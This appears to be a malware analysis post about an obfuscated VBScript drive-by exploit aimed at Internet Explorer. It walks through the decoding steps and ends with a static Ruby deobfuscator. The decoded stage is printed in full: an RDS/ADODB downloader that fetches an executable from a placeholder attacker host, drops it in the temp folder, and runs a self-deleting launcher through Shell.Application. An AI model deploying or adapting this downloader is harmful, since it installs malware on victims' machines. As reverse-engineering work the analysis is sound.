
Targeting IE

An easy way to target Internet Explorer is to use VBScript as the exploit obfuscation mechanism. In this case the obfuscation was an ancient form of encryption called the Windows Scripting Encoder. It was meant to “protect” source code from prying eyes, but as substitution ciphers go this one didn’t really help much. A decoder was written for it long ago, and I found it still worked very well for the purposes of this exercise.

<%'**Start Encode**#@~^RhUAAA==@#@[LONG LINES OF CHARS]#@&cSMEAA==^#~@>

The decrypted page contained yet another blob to decode, but this time it was simply ASCII character numbers. Ruby made quick work of this using sprintf:

# characters holds the comma-separated ASCII codes from the page, already split
message = ""
characters.each do |character|
  message = message + sprintf("%c", character.to_i)
end

<script language="VBScript">
<%@ LANGUAGE = VBScript.Encode %>

<%
AK47="http://EVIL.SITE/xy.exe"

Function rechange(kitty)
str=Split(kitty,",")
T=""
For i = 0 To UBound(str)
T=T+Chr(eval(str(i)))
Next
rechange=T
End Function
T="[LONG STRING OF COMMA SEPARATED DIGITS]"
i=T
execute(rechange(I))
%>

The ending here is predictable. The decoded segment uses ADODB to deliver an executable to the victim and executes it with Shell.Application. It had the look of code that was machine generated rather than written by hand. That reeks of a toolkit!
There is an interesting forum post with the quote “rav is rubbish”, plus several mentions of this code in Chinese forums.


'11
https="rav is rubbish"
'11
On Error Resume Next
'11
jjyy= "ob"&"je"&"ct"
'11
Set PP=document.createElement(jjyy)
'11
PP.SetAttribute "class"+"id", "clsid"&":BD96"&"C556"&"-65A3-"&"11D0-98"&"3A-00C04"&"FC2"&"9E36"
'11
Set XXX1=PP.CreateObject("M"&"ic"&"ros"&"oft."&"XML"&"HT"&"TP","")
'11
XXX1.Open "G"&"ET", AK47, False
'11
XXX1.Send
'11
ExeName="co"&"mm"&"om"&"d.pif"
'11
CallVbs="ca"&"ll.vbs"
'11
Set XXX2=PP.createobject("Scri"&"p"&"ti"&"ng.F"&"i"&"le"&"Sy"&"st"&"e"&"mO"&"bje"&"ct","")
'11
Set XXX3=XXX2.GetSpecialFolder(2)
'11
ExeName=XXX2.BuildPath(XXX3,ExeName)
'11
CallVbs=XXX2.BuildPath(XXX3,CallVbs)
'11
AAA="A"&"d"
'11
CCC="o"&"d"&"b"&"."&"s"&"tre"&"am"
'11
DC=AAA&CCC
'11
Set XXX4=PP.createobject(DC,"")
'11
XXX4.type=1
'11
XXX4.Open
'11
XXX4.Write XXX1.ResponseBody
'11
XXX4.Savetofile ExeName,2
'11
XXX4.Close
'11
XXX4.Type=2
'11
XXX4.Open
'11
XXX4.WriteText "On Error Resume Next"&vbCrLf&"Set ws=CreateObject(""Wscript.Shell"")"&vbCrLf&"ws.Run ("""&ExeName&""")"&vbCrLf&"Set fso = CreateObject(""Scripting.FileSystemObject"")"&vbCrLf&"WScript.Sleep 1000"&vbCrLf&"fso.DeleteFile(WScript.ScriptName)"&vbCrLf&"If fso.FileExists("""&CallVbs&""") Then fso.DeleteFile("""&CallVbs&""")"&vbCrLf&"If fso.FileExists("""&html&""") Then fso.DeleteFile("""&html&""")"
'11
XXX4.Savetofile CallVbs,2
'11
XXX4.Close
'11
GBA="Sh"&"e"&"l"&"l"&"."&"Ap"&"p"&"li"
'11
GBP="ca"&"ti"&"on"
'11
Set APIRun=PP.createobject(GBA&GBP,"")
'22
'33
APIRun.ShellExecute CallVbs,"","","Open",0
'44
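
Both decoding steps described above can be done statically, without running any of the script. The following is an added example, not code from the original post or from the toolkit: it decodes the character-code blob without eval and folds the split string literals of the final stage. The helper names and the sample blob are constructed for illustration.

```ruby
# Added example (helper names are hypothetical, not from the original post).

# Decode the comma-separated character codes without eval(). The sample's
# rechange() eval()s every element, so an analyst's decoder should accept
# plain decimal byte values only and report anything else.
def decode_char_codes(blob)
  blob.split(",").map do |tok|
    tok = tok.strip
    raise ArgumentError, "not a byte value: #{tok.inspect}" unless tok.match?(/\A\d{1,3}\z/) && tok.to_i <= 255
    tok.to_i.chr
  end.join
end

# Join adjacent string literals ("a"&"b" or "a"+"b") on one line.
# Tokenising first keeps doubled quotes ("") inside a literal intact.
def fold_line(line)
  out = []
  line.scan(/"(?:[^"]|"")*"|[^"]+/).each do |tok|
    if tok.start_with?('"') && out.size >= 2 &&
       out[-1].match?(/\A\s*[&+]\s*\z/) && out[-2].start_with?('"')
      out.pop                               # drop the operator
      out[-1] = out[-1][0..-2] + tok[1..]   # merge the two literals
    else
      out << tok
    end
  end
  out.join
end

# Drop blank and comment-only filler lines (such as '11), then fold the rest.
def deobfuscate(vbs)
  vbs.lines.map(&:strip)
     .reject { |l| l.empty? || l.start_with?("'") }
     .map { |l| fold_line(l) }
end

# Constructed blob: the character codes of  x="ob"&"je"&"ct"
BLOB = "120,61,34,111,98,34,38,34,106,101,34,38,34,99,116,34"

# Three lines copied from the listing above, with their filler comments.
STAGE2 = <<~'VBS'
  '11
  PP.SetAttribute "class"+"id", "clsid"&":BD96"&"C556"&"-65A3-"&"11D0-98"&"3A-00C04"&"FC2"&"9E36"
  '11
  Set XXX1=PP.CreateObject("M"&"ic"&"ros"&"oft."&"XML"&"HT"&"TP","")
  '11
  DC=AAA&CCC
VBS

puts deobfuscate(decode_char_codes(BLOB))
puts deobfuscate(STAGE2)
```

Names assembled through variables, such as DC=AAA&CCC, are left as they are; resolving those needs the earlier assignments to be substituted in as well.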
